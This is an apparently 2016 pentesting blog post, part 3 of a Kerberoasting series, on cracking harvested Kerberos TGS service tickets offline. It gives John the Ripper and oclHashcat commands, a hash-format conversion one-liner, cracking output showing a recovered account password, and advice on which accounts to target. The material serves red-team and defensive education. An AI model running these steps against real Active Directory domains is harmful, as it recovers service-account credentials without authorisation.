Kerberoasting - Part 3

2016-05-22 956 words 5 minutes

Contents

Previous works: There has been a number of different blog posts, presentations and projects that have happened before this post and I will reference a number of them during the post and at the end have a link to all that I know about. If you know of any works on this subject that I am missing please submit a comment below and I’ll will be sure to reference it.

Attacker KB Link: (to be updated later)

Common Findings DB Link: (to be updated later)

Now we start cracking the tickets we have and hopefully one will break. The problem with this format is that it takes a LONG time to crack, not as slow as some, but certainly not as fast as NTLM or the like, so pick your targets carefully as the more tickets you try and crack at once the slower it’s going to go.

Cracking SPN tickets

John the Ripper

Format added September 30th 2015: https://github.com/magnumripper/JohnTheRipper/commit/05e514646dfe5aa65ee48774571c0169f7e25a53

If you aren’t already using the magnumripper version of John The Ripper you should be, it’s the latest and great and usually has all of the updated formats, fixes, and speedups. In this case it’s also the only version that has the KRB5TGS format.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


root@wpad:~/johntheripper/run# ./kirbi2john.py /root/empire-dev/downloads/BDW3E2G2ZRKCUS3B/*.kirbi > /tmp/johnkirb.txt

root@wpad:~/johntheripper/run# ./john /tmp/johnkirb.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 11 password hashes with 11 different salts (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Warning: OpenMP is disabled; a non-OpenMP build may be faster
Press 'q' or Ctrl-C to abort, almost any other key for status
0g 0:00:00:07 3.35% (ETA: 23:38:44) 0g/s 69751p/s 767263c/s 767263C/s 129700..123junior
ASDqwe123        ($krb5tgs$unkown)
ASDqwe123        ($krb5tgs$unkown)

w00t! Easy passwords. These are valid account passwords and you should be able to do with them whatever that account can do. We will explore the ability to use them as silver tickets later in this post but don’t loose sight that you have a completely valid new account that has access somewhere.

oclHashcat

John The Ripper is fast, but we need that GPU speed for slow hashes like this. Again, we are on the cutting edge of hashes it seems so we are going to have to build the Github version of oclHashcat

Support added to oclHashcat to crack Kerberos 5 TGS-REP: https://t.co/wsL2VUihNR (Our first algorithm contributed by community, yay!)
— hashcat (@hashcat) February 17, 2016

Luckily, building it is pretty straight forward: https://github.com/hashcat/oclHashcat/blob/master/docs/BUILD.md

Problem is that we have hashes in John the Ripper format and we have to get them into a format that oclHashcat understands:

Example Hashes: https://hashcat.net/wiki/doku.php?id=example_hashes

1

13100	Kerberos 5 TGS-REP etype 23 - $krb5tgs$23$*user$realm$test/spn*$140964709dbdeccbc6121b675ccfb8b2$af937e9d5691b74600e514a3105976f1a8ddb2eed3aeb008ea74ff50bee7a65f14e8c1cbbc360687e6d867c9fbe2e4b2004d0584f0c283a18f613c69c756f78c001647e01da84466f59c655a25913b0cb4e42f0dc88f461e921441da40d6fb56d40545f71b841d00f019f135eb93c2357253796e5dc7da8a455d4fe17c966c3ea3ac620eb5e51c44c8a9cc48d385680c64c519e2113497315e7d7623044d48e2272bd9836b754755c3494040b487757a936780daeff859dd2c8839

If you got your tickets from kirbi2john.py you can convert them using

1

cat kirbi2johnoutput.txt | sed 's/\$krb5tgs\$\(.*\):\(.*\)/\$krb5tgs\$23\$\*\1\*\$\2/'

If you got them from Impacket, they are already in a format that is compatible with both John the Ripper and oclHashcat.

Here is the speed results that Atom was getting using his AMD R9 GPU:

http://pastebin.com/raw/3eHx2bFr

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42


root@sf:~/oclHashcat# ./oclHashcat -m 13100 hash -w 3 -a 3 ?l?l?l?l?l?l?l 
oclHashcat v2.01 (g0891e39) starting...

Device #1: Hawaii, 2858/4025 MB allocatable, 1010Mhz, 44MCU
Device #2: AMD FX(tm)-8120 Eight-Core Processor, skipped

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable Optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
* Brute-Force
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 80c

Device #1: Kernel /root/git/oclHashcat/kernels/m13100_a3.919aa8b9.kernel (234320 bytes)
Device #1: Kernel /root/git/oclHashcat/kernels/markov_le.919aa8b9.kernel (36184 bytes)

Device #1: autotuned kernel-accel to 64
Device #1: autotuned kernel-loops to 50

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit =>

$krb5tgs$23$*user$realm$test/hashcat*$08e2261b7a89e56f530b2f7e0620fe8b$ecdca97c13814c95810d7706faf986dad98d06ba033fc5a45fbe9b417b855db5:hashcat

Session.Name...: oclHashcat
Status.........: Cracked
Input.Mode.....: Mask (?l?l?l?l?l?l?l) [7]
Hash.Target....: $krb5tgs$23$*user$realm$test/hashcat*$08e...
Hash.Type......: Kerberos 5 TGS-REP etype 23
Time.Started...: Wed Feb 17 08:33:57 2016 (5 secs)
Speed.Dev.#1...:   111.0 MH/s (80.83ms)
Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.......: 252313600/8031810176 (3.14%)
Rejected.......: 0/252313600 (0.00%)
Restore.Point..: 0/456976 (0.00%)
HWMon.GPU.#1...:  0% Util, 42c Temp, 20% Fan

Started: Wed Feb 17 08:33:57 2016
Stopped: Wed Feb 17 08:34:04 2016

Where I was only getting about half of that speed against one hash (NVidia GTX 970):

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


Session.Name...: oclHashcat
Status.........: Running
Rules.Type.....: File (rules\dive.rule)
Input.Mode.....: File (..\dictionarys\rockyou.txt)
Hash.Target....: (snip)
Hash.Type......: Kerberos 5 TGS-REP etype 23
Time.Started...: Sun May 22 01:32:50 2016 (25 secs)
Time.Estimated.: Sun May 22 09:04:48 2016 (7 hours, 31 mins)
Speed.Dev.#1...: 57894.8 kH/s (14.37ms)
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts

And as you can see, going against 100 hashes pushed the wait time out to 30 days vs. 7 hours.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10


Session.Name...: oclHashcat
Status.........: Running
Rules.Type.....: File (rules\dive.rule)
Input.Mode.....: File (..\dictionarys\rockyou.txt)
Hash.Target....: (snip)
Hash.Type......: Kerberos 5 TGS-REP etype 23
Time.Started...: Sun May 22 01:35:16 2016 (16 secs)
Time.Estimated.: Wed Jun 22 14:28:17 2016 (31 days, 12 hours)
Speed.Dev.#1...: 55873.1 kH/s (14.11ms)
Recovered......: 0/100 (0.00%) Digests, 0/1 (0.00%) Salts

So pick your targets and just go after the ones that are old / password hasn’t been changed in years.

References:

Tools

Presentations

Tim Medin’s Slides - [Kicking the Guard Dog of Hades - slides](https://files.sans.org/summit/hackfest2014/PDFs/Kicking%20the%20Guard%20Dog%20of%20Hades%20-%20Attacking%20Microsoft%20Kerberos%20%20-%20Tim%20Medin(1).pdf)
Tim Medin’s Video - Kicking the Guard Dog of Hades - video